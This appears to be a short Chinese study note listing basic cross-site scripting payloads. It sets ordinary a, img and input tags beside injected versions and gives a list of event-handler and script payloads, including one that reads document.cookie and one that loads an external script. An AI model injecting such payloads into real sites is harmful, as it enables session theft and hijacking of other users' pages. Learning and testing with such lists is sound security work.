实际运用还不是很深入,先做个记录
<a>标签
<a href= https://www.baidu.com/>新闻</a>
<a href=javascript:alert(1)>新闻</a>
<img>标签
<img src=http://pic1.sc.chinaz.com/Files/pic/pic9/202005/apic25412_s.jpg />
<img src=x onerror=alert(1) />
<input>标签
<input type="text" />
<input onmouseover=alert(1) />
payload-有效载荷
<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x onerror=alert(1)> #加载图形失败执行
<iframe onload=alert('xss')> #框架
<svg onload=alert(1)>
<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onload=alert(1)>
<style onload=alert(1)></style>
<input onmouseover=alert(1)>
网友评论